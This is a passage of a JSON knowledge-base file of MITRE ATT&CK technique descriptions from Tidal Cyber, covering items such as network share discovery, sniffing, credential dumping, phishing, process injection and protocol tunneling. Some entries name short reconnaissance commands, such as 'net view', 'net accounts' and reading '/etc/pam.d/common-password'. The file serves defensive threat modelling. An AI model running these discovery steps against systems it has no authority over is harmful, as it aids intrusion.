"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
"type": "uses"
}
],
"uuid": "5bab1234-8d1e-437f-88a0-d527b2dfc6cd",
"value": "Network Service Discovery"
},
{
"description": "Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network. \n\nFile sharing over a Windows network occurs over the SMB protocol. <sup>[[Wikipedia Shared Resource](https://app.tidalcyber.com/references/6cc6164e-84b3-4413-9895-6719248808fb)]</sup> <sup>[[TechNet Shared Folder](https://app.tidalcyber.com/references/80a9b92a-1404-4454-88f0-dd929a12e16f)]</sup> [Net](https://app.tidalcyber.com/software/c9b8522f-126d-40ff-b44e-1f46098bd8cc) can be used to query a remote system for available shared drives using the <code>net view \\\\\\\\remotesystem</code> command. It can also be used to query shared drives on the local system using <code>net share</code>. For macOS, the <code>sharing -l</code> command lists all shared points used for smb services.",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
"type": "uses"
}
],
"uuid": "ac5e465f-466d-41e4-933a-04e2c861e820",
"value": "Network Share Discovery"
},
{
"description": "Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\n\nData captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning and SMB Relay](https://app.tidalcyber.com/technique/b44a263f-76b2-4a1f-baeb-dd285974eca6), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.\n\nNetwork sniffing may reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent [Lateral Movement](https://app.tidalcyber.com/tactics/50ba4930-7c8e-4ef9-bc36-70e7dae661eb) and/or [Defense Evasion](https://app.tidalcyber.com/tactics/8e29c6c9-0c10-4bb0-827d-ff0ab8922726) activities. Adversaries may also utilize network sniffing during [Adversary-in-the-Middle](https://app.tidalcyber.com/technique/d98dbf30-c454-42ff-a9f3-2cd3319cc0d9) (AiTM) to passively gain additional knowledge about the environment.\n\nIn cloud-based environments, adversaries may still be able to use traffic mirroring services to sniff network traffic from virtual machines. For example, AWS Traffic Mirroring, GCP Packet Mirroring, and Azure vTap allow users to define specified instances to collect traffic from and specified targets to send collected traffic to.<sup>[[AWS Traffic Mirroring](https://app.tidalcyber.com/references/6b77a2f3-39b8-4574-8dee-cde7ba9debff)]</sup><sup>[[GCP Packet Mirroring](https://app.tidalcyber.com/references/c91c6399-3520-4410-936d-48c3b13235ca)]</sup><sup>[[Azure Virtual Network TAP](https://app.tidalcyber.com/references/3f106d7e-f101-4adb-bbd1-d8c04a347f85)]</sup> Often, much of this traffic will be in cleartext due to the use of TLS termination at the load balancer level to reduce the strain of encrypting and decrypting traffic.<sup>[[Rhino Security Labs AWS VPC Traffic Mirroring](https://app.tidalcyber.com/references/09cac813-862c-47c8-a47f-154c5436afbb)]</sup><sup>[[SpecterOps AWS Traffic Mirroring](https://app.tidalcyber.com/references/6ab2cfa1-230f-498e-8049-fcdd2f7296dd)]</sup> The adversary can then use exfiltration techniques such as Transfer Data to Cloud Account in order to access the sniffed traffic.<sup>[[Rhino Security Labs AWS VPC Traffic Mirroring](https://app.tidalcyber.com/references/09cac813-862c-47c8-a47f-154c5436afbb)]</sup>\n\nOn network devices, adversaries may perform network captures using [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) commands such as `monitor capture`.<sup>[[US-CERT-TA18-106A](https://app.tidalcyber.com/references/1fe55557-94af-4697-a675-884701f70f2a)]</sup><sup>[[capture_embedded_packet_on_software](https://app.tidalcyber.com/references/5d973180-a28a-5c8f-b13a-45d21331700f)]</sup>",
"meta": {
"platforms": [
"IaaS",
"Linux",
"macOS",
"Network",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
"type": "uses"
},
{
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
"type": "uses"
}
],
"uuid": "bbad213d-477d-43bf-9501-ad7d74bac323",
"value": "Network Sniffing"
},
{
"description": "Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.<sup>[[Wikipedia OSI](https://app.tidalcyber.com/references/d1080030-12c7-4223-92ab-fb764acf111d)]</sup> Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).\n\nICMP communication between hosts is one example.<sup>[[Cisco Synful Knock Evolution](https://app.tidalcyber.com/references/29301297-8343-4f75-8096-7fe229812f75)]</sup> Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts.<sup>[[Microsoft ICMP](https://app.tidalcyber.com/references/47612548-dad1-4bf3-aa6f-a53aefa06f6a)]</sup> However, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications.",
"meta": {
"platforms": [
"Linux",
"macOS",
"Network",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb",
"type": "uses"
}
],
"uuid": "4aed5968-6380-47d2-bbd7-3a4d959089e1",
"value": "Non-Application Layer Protocol"
},
{
"description": "Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088<sup>[[Symantec Elfin Mar 2019](https://app.tidalcyber.com/references/55671ede-f309-4924-a1b4-3d597517b27e)]</sup> or port 587<sup>[[Fortinet Agent Tesla April 2018](https://app.tidalcyber.com/references/86a65be7-0f70-4755-b526-a26b92eabaa2)]</sup> as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.\n\nAdversaries may also make changes to victim systems to abuse non-standard ports. For example, Registry keys and other configuration settings can be used to modify protocol and port pairings.<sup>[[change_rdp_port_conti](https://app.tidalcyber.com/references/c0deb077-6c26-52f1-9e7c-d1fb535a02a0)]</sup>",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb",
"type": "uses"
}
],
"uuid": "36850d17-a7d5-41ac-aa89-040b9c0b2b3f",
"value": "Non-Standard Port"
},
{
"description": "Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses. \n\nPayloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and [Deobfuscate/Decode Files or Information](https://app.tidalcyber.com/technique/88c2fb46-877a-4005-8425-7639d0da1920) for [User Execution](https://app.tidalcyber.com/technique/b84435ab-2ff4-4b6f-ba71-b4b815474872). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. <sup>[[Volexity PowerDuke November 2016](https://app.tidalcyber.com/references/4026c055-6020-41bb-a4c8-54b308867023)]</sup> Adversaries may also use compressed or archived scripts, such as JavaScript. \n\nPortions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. <sup>[[Linux/Cdorked.A We Live Security Analysis](https://app.tidalcyber.com/references/f76fce2e-2884-4b50-a7d7-55f08b84099c)]</sup> Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. <sup>[[Carbon Black Obfuscation Sept 2016](https://app.tidalcyber.com/references/bed8ae68-9738-46fb-abc9-0004fa35636a)]</sup>\n\nAdversaries may also abuse [Command Obfuscation](https://app.tidalcyber.com/technique/d8406198-626c-5659-945e-2b5105fcd0c9) to obscure commands executed from payloads or directly via [Command and Scripting Interpreter](https://app.tidalcyber.com/technique/a2184d53-63b1-4c40-81ed-da799080c36c). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and application control mechanisms. <sup>[[FireEye Obfuscation June 2017](https://app.tidalcyber.com/references/6d1089b7-0efe-4961-8abc-22a882895377)]</sup> <sup>[[FireEye Revoke-Obfuscation July 2017](https://app.tidalcyber.com/references/e03e9d19-18bb-4d28-8c96-8c1cef89a20b)]</sup><sup>[[PaloAlto EncodedCommand March 2017](https://app.tidalcyber.com/references/069ef9af-3402-4b13-8c60-b397b0b0bfd7)]</sup> ",
"meta": {
"platforms": [
"Linux",
"macOS",
"Network",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "046cc07e-8700-4536-9c5b-6ecb384f52b0",
"value": "Obfuscated Files or Information"
},
{
"description": "Adversaries may buy and/or steal capabilities that can be used during targeting. Rather than developing their own capabilities in-house, adversaries may purchase, freely download, or steal them. Activities may include the acquisition of malware, software (including licenses), exploits, certificates, and information relating to vulnerabilities. Adversaries may obtain capabilities to support their operations throughout numerous phases of the adversary lifecycle.\n\nIn addition to downloading free malware, software, and exploits from the internet, adversaries may purchase these capabilities from third-party entities. Third-party entities can include technology companies that specialize in malware and exploits, criminal marketplaces, or individuals.<sup>[[NationsBuying](https://app.tidalcyber.com/references/a3e224e7-fe22-48d6-9ff5-35900f06c060)]</sup><sup>[[PegasusCitizenLab](https://app.tidalcyber.com/references/d248e284-37d3-4425-a29e-5a0c814ae803)]</sup>\n\nIn addition to purchasing capabilities, adversaries may steal capabilities from third-party entities (including other adversaries). This can include stealing software licenses, malware, SSL/TLS and code-signing certificates, or raiding closed databases of vulnerabilities or exploits.<sup>[[DiginotarCompromise](https://app.tidalcyber.com/references/3c9b7b9a-d30a-4865-a96c-6e68d9e20452)]</sup>",
"meta": {
"platforms": [
"PRE"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff",
"type": "uses"
}
],
"uuid": "a6740db8-10d6-4e5b-986b-7695d3fc4b85",
"value": "Obtain Capabilities"
},
{
"description": "Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.\n\nA variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.<sup>[[SensePost Ruler GitHub](https://app.tidalcyber.com/references/aa0a1508-a872-4e69-bf20-d3c8202f18c1)]</sup> These persistence mechanisms can work within Outlook or be used through Office 365.<sup>[[TechNet O365 Outlook Rules](https://app.tidalcyber.com/references/c7f9bd2f-254a-4254-8a92-a3ab02455fcb)]</sup>",
"meta": {
"platforms": [
"Office 365",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
}
],
"uuid": "db846575-a79b-4403-870d-5842be82001d",
"value": "Office Application Startup"
},
{
"description": "Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password. Credentials can be obtained from OS caches, memory, or structures.<sup>[[Brining MimiKatz to Unix](https://app.tidalcyber.com/references/5ad06565-6694-4c42-81c9-880d66f6d07f)]</sup> Credentials can then be used to perform [Lateral Movement](https://app.tidalcyber.com/tactics/50ba4930-7c8e-4ef9-bc36-70e7dae661eb) and access restricted information.\n\nSeveral of the tools mentioned in associated sub-techniques may be used by both adversaries and professional security testers. Additional custom tools likely exist as well.\n",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
"type": "uses"
}
],
"uuid": "368f85f9-2b15-4732-80fe-087694eaf34d",
"value": "OS Credential Dumping"
},
{
"description": "Adversaries may attempt to access detailed information about the password policy used within an enterprise network or cloud environment. Password policies are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://app.tidalcyber.com/technique/c16eef78-232e-47a2-98e9-046ec075b13c). This information may help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks that adhere to the policy (e.g., if the minimum password length is 8, not trying passwords such as 'pass123'; not checking more than 3-4 passwords per account if the lockout threshold is 6, so as not to lock out accounts).\n\nPassword policies can be set and discovered on Windows, Linux, and macOS systems via various command shell utilities such as <code>net accounts (/domain)</code>, <code>Get-ADDefaultDomainPasswordPolicy</code>, <code>chage -l <username></code>, <code>cat /etc/pam.d/common-password</code>, and <code>pwpolicy getaccountpolicies</code>.<sup>[[Superuser Linux Password Policies](https://app.tidalcyber.com/references/c0bbc881-594a-408c-86a2-211ce6279231)]</sup><sup>[[Jamf User Password Policies](https://app.tidalcyber.com/references/aa3846fd-a307-4be5-a487-9aa2688d5816)]</sup> Adversaries may also leverage a [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) on network devices to discover password policy information (e.g. <code>show aaa</code>, <code>show aaa common-criteria policy all</code>).<sup>[[US-CERT-TA18-106A](https://app.tidalcyber.com/references/1fe55557-94af-4697-a675-884701f70f2a)]</sup>\n\nPassword policies can be discovered in cloud environments using available APIs such as <code>GetAccountPasswordPolicy</code> in AWS.<sup>[[AWS GetPasswordPolicy](https://app.tidalcyber.com/references/dd44d565-b9d9-437e-a31a-a52c6a21e3b3)]</sup>",
"meta": {
"platforms": [
"IaaS",
"Linux",
"macOS",
"Network",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
"type": "uses"
}
],
"uuid": "2bf2e498-99c8-4e36-ad4b-e675d95ac925",
"value": "Password Policy Discovery"
},
{
"description": "Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.<sup>[[Peripheral Discovery Linux](https://app.tidalcyber.com/references/427b3a1b-88ea-4027-bae6-7fb45490b81d)]</sup><sup>[[Peripheral Discovery macOS](https://app.tidalcyber.com/references/2a3c5216-b153-4d89-b0b1-f32af3aa83d0)]</sup> Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
"type": "uses"
}
],
"uuid": "0997d871-875e-41e4-891c-f8a4ed8b2f31",
"value": "Peripheral Device Discovery"
},
{
"description": "Adversaries may attempt to discover group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions.\n\nAdversaries may attempt to discover group permission settings in many different ways. This data may provide the adversary with information about the compromised environment that can be used in follow-on activity and targeting.<sup>[[CrowdStrike BloodHound April 2018](https://app.tidalcyber.com/references/fa99f290-e42c-4311-9f6d-c519c9ab89fe)]</sup>",
"meta": {
"platforms": [
"Azure AD",
"Containers",
"Google Workspace",
"IaaS",
"Linux",
"macOS",
"Office 365",
"SaaS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
"type": "uses"
}
],
"uuid": "f9d61206-3063-4d04-b06f-225f4766bff1",
"value": "Permission Groups Discovery"
},
{
"description": "Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.\n\nAdversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source, as well as evasive techniques such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://app.tidalcyber.com/technique/01505d46-8675-408d-881e-68f4d8743d47)).<sup>[[Microsoft OAuth Spam 2022](https://app.tidalcyber.com/references/086c06a0-3960-5fa8-b034-cef37a3aee90)]</sup><sup>[[Palo Alto Unit 42 VBA Infostealer 2014](https://app.tidalcyber.com/references/c3eccab6-b12b-513a-9a04-396f7b3dcf63)]</sup> Another way to accomplish this is by forging or spoofing<sup>[[Proofpoint-spoof](https://app.tidalcyber.com/references/fe9f7542-bbf0-5e34-b3a9-8596cc5aa754)]</sup> the identity of the sender, which can be used to fool both the human recipient as well as automated security tools.<sup>[[cyberproof-double-bounce](https://app.tidalcyber.com/references/4406d688-c392-5244-b438-6995f38dfc61)]</sup> \n\nVictims may also receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware,<sup>[[sygnia Luna Month](https://app.tidalcyber.com/references/3e1c2a64-8446-538d-a148-2de87991955a)]</sup><sup>[[CISA Remote Monitoring and Management Software](https://app.tidalcyber.com/references/1ee55a8c-9e9d-520a-a3d3-1d2da57e0265)]</sup> or install adversary-accessible remote management tools onto their computer (i.e., [User Execution](https://app.tidalcyber.com/technique/b84435ab-2ff4-4b6f-ba71-b4b815474872)).<sup>[[Unit42 Luna Moth](https://app.tidalcyber.com/references/ec52bcc9-6a56-5b94-8534-23c8e7ce740f)]</sup>",
"meta": {
"platforms": [
"Google Workspace",
"Linux",
"macOS",
"Office 365",
"SaaS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "586a5b49-c566-4a57-beb4-e7c667f9c34c",
"type": "uses"
}
],
"uuid": "d4a36624-50cb-43d3-95af-a2e10878a533",
"value": "Phishing"
},
{
"description": "Adversaries may send phishing messages to elicit sensitive information that can be used during targeting. Phishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Phishing for information is different from [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533) in that the objective is gathering data from the victim rather than executing malicious code.\n\nAll forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass credential harvesting campaigns.\n\nAdversaries may also try to obtain information directly through the exchange of emails, instant messages, or other electronic conversation means.<sup>[[ThreatPost Social Media Phishing](https://app.tidalcyber.com/references/186c1213-d0c5-4eb6-aa0f-0fd61b07a1f7)]</sup><sup>[[TrendMictro Phishing](https://app.tidalcyber.com/references/621f1c52-5f34-4293-a507-b58c4084a19b)]</sup><sup>[[PCMag FakeLogin](https://app.tidalcyber.com/references/f652524c-7950-4a8a-9860-0e658a9581d8)]</sup><sup>[[Sophos Attachment](https://app.tidalcyber.com/references/b4aa5bf9-31db-42ee-93e8-a576ecc00b57)]</sup><sup>[[GitHub Phishery](https://app.tidalcyber.com/references/6da51561-a813-4802-aa84-1b3de1bc2e14)]</sup> Victims may also receive phishing messages that direct them to call a phone number where the adversary attempts to collect confidential information.<sup>[[Avertium callback phishing](https://app.tidalcyber.com/references/abeb1146-e5e5-5ecc-9b70-b348fba097f6)]</sup>\n\nPhishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://app.tidalcyber.com/technique/9a2d6628-0dd7-4f25-a242-b752fcf47ff4) or [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3)) and/or sending multiple, seemingly urgent messages. Another way to accomplish this is by forging or spoofing<sup>[[Proofpoint-spoof](https://app.tidalcyber.com/references/fe9f7542-bbf0-5e34-b3a9-8596cc5aa754)]</sup> the identity of the sender, which can be used to fool both the human recipient as well as automated security tools.<sup>[[cyberproof-double-bounce](https://app.tidalcyber.com/references/4406d688-c392-5244-b438-6995f38dfc61)]</sup> \n\nPhishing for information may also involve evasive techniques, such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://app.tidalcyber.com/technique/01505d46-8675-408d-881e-68f4d8743d47)).<sup>[[Microsoft OAuth Spam 2022](https://app.tidalcyber.com/references/086c06a0-3960-5fa8-b034-cef37a3aee90)]</sup><sup>[[Palo Alto Unit 42 VBA Infostealer 2014](https://app.tidalcyber.com/references/c3eccab6-b12b-513a-9a04-396f7b3dcf63)]</sup>",
"meta": {
"platforms": [
"PRE"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e",
"type": "uses"
}
],
"uuid": "b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06",
"value": "Phishing for Information"
},
{
"description": "Adversaries may modify property list files (plist files) to enable other malicious activity, while also potentially evading and bypassing system defenses. macOS applications use plist files, such as the <code>info.plist</code> file, to store properties and configuration settings that inform the operating system how to handle the application at runtime. Plist files are structured metadata in key-value pairs formatted in XML based on Apple's Core Foundation DTD. Plist files can be saved in text or binary format.<sup>[[fileinfo plist file description](https://app.tidalcyber.com/references/24331b9d-68af-4db2-887f-3a984b6c5783)]</sup> \n\nAdversaries can modify key-value pairs in plist files to influence system behaviors, such as hiding the execution of an application (i.e. [Hidden Window](https://app.tidalcyber.com/technique/5e8b76ce-b75f-449c-9d8f-573b1ffdb2bd)) or running additional commands for persistence (ex: [Launch Agent](https://app.tidalcyber.com/technique/6dbe030c-5f87-4b45-9b6b-5bba2c0fad00)/[Launch Daemon](https://app.tidalcyber.com/technique/eff618a9-6498-4b01-bca1-cd5f3784fc27) or [Re-opened Applications](https://app.tidalcyber.com/technique/9459a27a-b892-4864-9916-814130bea485)).\n\nFor example, adversaries can add a malicious application path to the `~/Library/Preferences/com.apple.dock.plist` file, which controls apps that appear in the Dock. Adversaries can also modify the <code>LSUIElement</code> key in an application’s <code>info.plist</code> file to run the app in the background. Adversaries can also insert key-value pairs that set environment variables, such as <code>LSEnvironment</code>, to enable persistence via [Dynamic Linker Hijacking](https://app.tidalcyber.com/technique/b0d884c3-cf87-4610-992d-4ec54c667759).<sup>[[wardle chp2 persistence](https://app.tidalcyber.com/references/3684bacb-24cb-4467-b463-d0d3f5075c5c)]</sup><sup>[[eset_osx_flashback](https://app.tidalcyber.com/references/ce6e5a21-0063-4356-a77a-5c5f9fd2cf5c)]</sup>",
"meta": {
"platforms": [
"macOS"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "ee177ad0-d282-42c0-91f9-7bcf724e3d31",
"value": "Plist File Modification"
},
{
"description": "Adversaries may impair a system's ability to hibernate, reboot, or shut down in order to extend access to infected machines. When a computer enters a dormant state, some or all software and hardware may cease to operate which can disrupt malicious activity.<sup>[[Sleep, shut down, hibernate](https://app.tidalcyber.com/references/e9064801-0297-51d0-9089-db58f4811a9f)]</sup>\n\nAdversaries may abuse system utilities and configuration settings to maintain access by preventing machines from entering a state, such as standby, that can terminate malicious activity.<sup>[[Microsoft: Powercfg command-line options](https://app.tidalcyber.com/references/d9b5be77-5e44-5786-a683-82642b8dd8c9)]</sup><sup>[[systemdsleep Linux](https://app.tidalcyber.com/references/9537f6f9-1521-5c21-b14f-ac459a2d1b70)]</sup>\n\nFor example, `powercfg` controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.<sup>[[Two New Monero Malware Attacks Target Windows and Android Users](https://app.tidalcyber.com/references/a797397b-2af7-58b9-b66a-5ded260659f0)]</sup> Adversaries may also extend system lock screen timeout settings.<sup>[[BATLOADER: The Evasive Downloader Malware](https://app.tidalcyber.com/references/53e12ade-99ed-51ee-b5c8-32180f144658)]</sup> Other relevant settings, such as disk and hibernate timeout, can be similarly abused to keep the infected machine running even if no user is active.<sup>[[CoinLoader: A Sophisticated Malware Loader Campaign](https://app.tidalcyber.com/references/83469ab3-0199-5679-aa25-7b6885019552)]</sup>\n\nAware that some malware cannot survive system reboots, adversaries may entirely delete files used to invoke system shut down or reboot.<sup>[[Condi-Botnet-binaries](https://app.tidalcyber.com/references/a92b0d6c-b3e8-56a4-b1b4-1d117e59db84)]</sup>",
"meta": {
"platforms": [
"Linux",
"macOS",
"Network",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
}
],
"uuid": "0719ea2b-d630-5ada-9b04-c3136ff530ae",
"value": "Power Settings"
},
{
"description": "Adversaries may abuse Pre-OS Boot mechanisms as a way to establish persistence on a system. During the booting process of a computer, firmware and various startup services are loaded before the operating system. These programs control the flow of execution before the operating system takes control.<sup>[[Wikipedia Booting](https://app.tidalcyber.com/references/6d9c72cb-6cda-445e-89ea-7e695063d49a)]</sup>\n\nAdversaries may overwrite data in boot drivers or firmware such as the BIOS (Basic Input/Output System) and the Unified Extensible Firmware Interface (UEFI) to persist on systems at a layer below the operating system. This can be particularly difficult to detect, as malware at this level will not be detected by host software-based defenses.",
"meta": {
"platforms": [
"Linux",
"macOS",
"Network",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "33cd26b0-0248-4ee2-97a6-aab6a79824af",
"value": "Pre-OS Boot"
},
{
"description": "Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Administrator or otherwise elevated access may provide better process details. Adversaries may use the information from [Process Discovery](https://app.tidalcyber.com/technique/710ae610-0556-44e5-9de9-8be6159a23dd) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nIn Windows environments, adversaries could obtain details on running processes using the [Tasklist](https://app.tidalcyber.com/software/abae8f19-9497-4a71-82b6-ae6edd26ad98) utility via [cmd](https://app.tidalcyber.com/software/98d89476-63ec-4baf-b2b3-86c52170f5d8) or <code>Get-Process</code> via [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde). Information about processes can also be extracted from the output of [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560) calls such as <code>CreateToolhelp32Snapshot</code>. In Mac and Linux, this is accomplished with the <code>ps</code> command. Adversaries may also opt to enumerate processes via `/proc`. \n\nOn network devices, [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) commands such as `show processes` can be used to display current running processes.<sup>[[US-CERT-TA18-106A](https://app.tidalcyber.com/references/1fe55557-94af-4697-a675-884701f70f2a)]</sup><sup>[[show_processes_cisco_cmd](https://app.tidalcyber.com/references/944e529b-5e8a-54a1-b205-71dcb7dd304f)]</sup>",
"meta": {
"platforms": [
"Linux",
"macOS",
"Network",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
"type": "uses"
}
],
"uuid": "710ae610-0556-44e5-9de9-8be6159a23dd",
"value": "Process Discovery"
},
{
"description": "Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process. \n\nThere are many different ways to inject code into a process, many of which abuse legitimate functionalities. These implementations exist for every major OS but are typically platform specific. \n\nMore sophisticated samples may perform multiple process injections to segment modules and further evade detection, utilizing named pipes or other inter-process communication (IPC) mechanisms as a communication channel. ",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
},
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "7a6208ac-c75e-4e73-8969-0aaf6085cb6e",
"value": "Process Injection"
},
{
"description": "Adversaries may tunnel network communications to and from a victim system within a separate protocol to avoid detection/network filtering and/or enable access to otherwise unreachable systems. Tunneling involves explicitly encapsulating a protocol within another. This behavior may conceal malicious traffic by blending in with existing traffic and/or provide an outer layer of encryption (similar to a VPN). Tunneling could also enable routing of network packets that would otherwise not reach their intended destination, such as SMB, RDP, or other traffic that would be filtered by network appliances or not routed over the Internet. \n\nThere are various means to encapsulate a protocol within another protocol. For example, adversaries may perform SSH tunneling (also known as SSH port forwarding), which involves forwarding arbitrary data over an encrypted SSH tunnel.<sup>[[SSH Tunneling](https://app.tidalcyber.com/references/13280f38-0f17-42d3-9f92-693f1da60ffa)]</sup> \n\n[Protocol Tunneling](https://app.tidalcyber.com/technique/bd677092-d197-4230-b94a-438cb24260fd) may also be abused by adversaries during [Dynamic Resolution](https://app.tidalcyber.com/technique/987ad3da-9423-4fe0-a52b-b931c0b8b95f). Known as DNS over HTTPS (DoH), queries to resolve C2 infrastructure may be encapsulated within encrypted HTTPS packets.<sup>[[BleepingComp Godlua JUL19](https://app.tidalcyber.com/references/fd862d10-79bc-489d-a552-118014d01648)]</sup> \n\nAdversaries may also leverage [Protocol Tunneling](https://app.tidalcyber.com/technique/bd677092-d197-4230-b94a-438cb24260fd) in conjunction with [Proxy](https://app.tidalcyber.com/technique/ba6a869a-c870-4be6-bc08-e078f0efdc3b) and/or [Protocol Impersonation](https://app.tidalcyber.com/technique/eb15320a-cd24-45b2-b23f-05ef8daf1039) to further conceal C2 communications and infrastructure. ",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
